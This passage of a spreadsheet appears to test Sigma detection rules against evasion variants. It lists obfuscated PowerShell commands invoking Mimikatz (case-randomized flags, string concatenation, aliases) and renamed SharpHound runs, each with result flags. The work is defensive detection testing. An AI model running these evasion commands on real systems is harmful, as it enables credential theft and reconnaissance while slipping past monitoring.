        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C874" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D874" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E874" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOmMand "$part1 = 'Invoke-'; $part2 = 'Mimikatz'; $cmd = $part1 + $part2; iex $cmd"</t>
        </is>
      </c>
      <c r="F874" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G874" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H874" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I874" s="36" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J874" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K874" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="875" ht="15.75" customHeight="1" s="42">
      <c r="A875" s="43" t="n"/>
      <c r="B875" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C875" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D875" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E875" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COMmaNd "$part1 = 'Invoke-'; $part2 = 'Mimikatz'; $cmd = $part1 + $part2; iex $cmd"</t>
        </is>
      </c>
      <c r="F875" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G875" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H875" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I875" s="36" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J875" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K875" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="876" ht="15.75" customHeight="1" s="42">
      <c r="A876" s="43" t="n"/>
      <c r="B876" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C876" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D876" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E876" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ComManD "$part1 = 'Invoke-'; $part2 = 'Mimikatz'; $cmd = $part1 + $part2; iex $cmd"</t>
        </is>
      </c>
      <c r="F876" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G876" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H876" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I876" s="36" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J876" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K876" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="877" ht="15.75" customHeight="1" s="42">
      <c r="A877" s="43" t="n"/>
      <c r="B877" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C877" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D877" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E877" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F877" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G877" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H877" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I87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77" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K877" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="878" ht="15.75" customHeight="1" s="42">
      <c r="A878" s="43" t="n"/>
      <c r="B878" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C878" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D878" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E878" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmAnd "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F878" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G878" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H878" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I87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78" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K878" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="879" ht="15.75" customHeight="1" s="42">
      <c r="A879" s="43" t="n"/>
      <c r="B879" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C879" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D879" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E879" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F879" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G879" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H879" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I87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79" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K879" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="880" ht="15.75" customHeight="1" s="42">
      <c r="A880" s="43" t="n"/>
      <c r="B880" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C880" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D880" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E880" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -comMAND "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F880" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G880" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H880" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I88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0" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K880" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="881" ht="15.75" customHeight="1" s="42">
      <c r="A881" s="43" t="n"/>
      <c r="B881" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C881" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D881" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E881" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmANd "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F881" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G881" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H881" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I88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1" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K881" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="882" ht="15.75" customHeight="1" s="42">
      <c r="A882" s="43" t="n"/>
      <c r="B882" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C882" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D882" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E882" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -CoMMaNd "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F882" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G882" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H882" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I88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2" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K882" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="883" ht="15.75" customHeight="1" s="42">
      <c r="A883" s="43" t="n"/>
      <c r="B883" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C883" s="43" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D883" s="43" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E883" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -comMAnD "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F883" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G883" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H883" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I88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3" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K883" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="884" ht="15.75" customHeight="1" s="42">
      <c r="A884" s="36" t="n"/>
      <c r="B884" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C884" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D884" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E884" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F884" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G884" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H884" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I88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4" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K884" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="885" ht="15.75" customHeight="1" s="42">
      <c r="A885" s="36" t="n"/>
      <c r="B885" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C885" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D885" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E885" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COMmAnd "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F885" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G885" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H885" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I88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5" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K885" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="886" ht="15.75" customHeight="1" s="42">
      <c r="A886" s="36" t="n"/>
      <c r="B886" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C886" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D886" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E886" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOMmAnd "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F886" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G886" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H886" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I88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6" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K886" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="887" ht="15.75" customHeight="1" s="42">
      <c r="A887" s="43" t="n"/>
      <c r="B887" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C887" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D887" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E887" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ComMAnD "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F887" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G887" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H887" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I88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7" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K887" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="888" ht="15.75" customHeight="1" s="42">
      <c r="A888" s="43" t="n"/>
      <c r="B888" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C888" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D888" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E888" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOMMand "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F888" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G888" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H888" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I88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8" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K888" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="889" ht="15.75" customHeight="1" s="42">
      <c r="A889" s="43" t="n"/>
      <c r="B889" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C889" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D889" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E889" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F889" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G889" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H889" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I88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89" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K889" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="890" ht="15.75" customHeight="1" s="42">
      <c r="A890" s="43" t="n"/>
      <c r="B890" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C890" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D890" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E890" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COmMANd "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F890" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G890" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H890" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I89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0" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K890" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="891" ht="15.75" customHeight="1" s="42">
      <c r="A891" s="43" t="n"/>
      <c r="B891" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C891" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D891" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E891" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F891" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G891" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H891" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I89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1" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K891" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="892" ht="15.75" customHeight="1" s="42">
      <c r="A892" s="43" t="n"/>
      <c r="B892" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C892" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D892" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E892" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F892" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G892" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H892" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I89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2" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K892" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="893" ht="15.75" customHeight="1" s="42">
      <c r="A893" s="43" t="n"/>
      <c r="B893" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C893" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D893" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E893" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmand "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F893" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G893" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H893" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I89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3" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K893" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="894" ht="15.75" customHeight="1" s="42">
      <c r="A894" s="43" t="n"/>
      <c r="B894" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C894" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D894" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E894" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COmmaND "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F894" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G894" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H894" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I89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4" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K894" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="895" ht="15.75" customHeight="1" s="42">
      <c r="A895" s="43" t="n"/>
      <c r="B895" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C895" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D895" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E895" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -command "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F895" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G895" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H895" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I89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5" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K895" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="896" ht="15.75" customHeight="1" s="42">
      <c r="A896" s="43" t="n"/>
      <c r="B896" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C896" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D896" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E896" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COmmanD "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F896" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G896" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H896" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I89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6" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K896" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="897" ht="15.75" customHeight="1" s="42">
      <c r="A897" s="43" t="n"/>
      <c r="B897" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C897" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D897" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E897" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOMmaNd "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F897" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G897" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H897" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I89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897" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K897" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="898" ht="15.75" customHeight="1" s="42">
      <c r="A898" s="43" t="n"/>
      <c r="B898" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_group</t>
        </is>
      </c>
      <c r="C898" s="36" t="inlineStr">
        <is>
          <t>Local Groups Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D898" s="36" t="inlineStr">
        <is>
          <t>164eda96-11b2-430b-85ff-6a265c15bf32</t>
        </is>
      </c>
      <c r="E898" s="36" t="inlineStr">
        <is>
          <t>powershell.exe Get-LocalGroup</t>
        </is>
      </c>
      <c r="F898" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G898" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H898" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I898" s="43" t="n"/>
      <c r="J898" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K898" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="899" ht="15.75" customHeight="1" s="42">
      <c r="A899" s="43" t="inlineStr">
        <is>
          <t>t1069.002</t>
        </is>
      </c>
      <c r="B899" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_bloodhound_sharphound</t>
        </is>
      </c>
      <c r="C899" s="36" t="inlineStr">
        <is>
          <t>HackTool - Bloodhound/Sharphound Execution</t>
        </is>
      </c>
      <c r="D899" s="36" t="inlineStr">
        <is>
          <t>f376c8a7-a2d0-4ddc-aa0c-16c17236d962</t>
        </is>
      </c>
      <c r="E899" s="36" t="inlineStr">
        <is>
          <t>copy SharpHound.exe not_suspicious.exe; .\not_suspicious.exe --collectionmethods="All" --domain "contoso.local"</t>
        </is>
      </c>
      <c r="F899" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G899" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H899" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I899" s="43" t="n"/>
      <c r="J899" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K899" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="900" ht="15.75" customHeight="1" s="42">
      <c r="A900" s="43" t="inlineStr">
        <is>
          <t>t1069.002</t>
        </is>
      </c>
      <c r="B900" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_bloodhound_sharphound</t>
        </is>
      </c>
      <c r="C900" s="36" t="inlineStr">
        <is>
          <t>HackTool - Bloodhound/Sharphound Execution</t>
        </is>
      </c>
      <c r="D900" s="36" t="inlineStr">
        <is>
          <t>f376c8a7-a2d0-4ddc-aa0c-16c17236d962</t>
        </is>
      </c>
      <c r="E900" s="36" t="inlineStr">
        <is>
          <t>copy SharpHound.exe not_suspicious.exe; .\not_suspicious.exe --collectionmethods "Default" --domain "contoso.local" --zipfilename:"data.zip"</t>
        </is>
      </c>
      <c r="F900" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G900" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H900" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I900" s="43" t="n"/>
      <c r="J900" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K900" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="901" ht="15.75" customHeight="1" s="42">
      <c r="A901" s="43" t="inlineStr">
        <is>
          <t>t1069.002</t>
        </is>
      </c>
      <c r="B901" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_bloodhound_sharphound</t>
        </is>
      </c>
      <c r="C901" s="36" t="inlineStr">
        <is>
          <t>HackTool - Bloodhound/Sharphound Execution</t>
        </is>
      </c>
      <c r="D901" s="36" t="inlineStr">
        <is>
          <t>f376c8a7-a2d0-4ddc-aa0c-16c17236d962</t>
        </is>
      </c>
      <c r="E901" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /"c" SharpHound.exe -jsOnFolDEr C:\temp /"ZipFileName" C:\temp\sharphound.zip</t>
        </is>
      </c>
      <c r="F901" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G901" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H901" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I901" s="43" t="n"/>
      <c r="J901" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K901" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="902" ht="15.75" customHeight="1" s="42">
      <c r="A902" s="43" t="n"/>
      <c r="B902" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpview</t>
        </is>
      </c>
      <c r="C902" s="36" t="inlineStr">
        <is>
          <t>HackTool - SharpView Execution</t>
        </is>
      </c>
      <c r="D902" s="36" t="inlineStr">
        <is>
          <t>b2317cfa-4a47-4ead-b3ff-297438c0bc2d</t>
        </is>
      </c>
      <c r="E902" s="36" t="inlineStr">
        <is>
          <t>C:\Windows\System32\Notepad.exe</t>
        </is>
      </c>
      <c r="F902" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G902" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H902" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I902" s="43" t="n"/>
      <c r="J902" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K902" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="903" ht="15.75" customHeight="1" s="42">
      <c r="A903" s="43" t="n"/>
      <c r="B903" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpview</t>
        </is>
      </c>
      <c r="C903" s="36" t="inlineStr">
        <is>
          <t>HackTool - SharpView Execution</t>
        </is>
      </c>
      <c r="D903" s="36" t="inlineStr">
        <is>
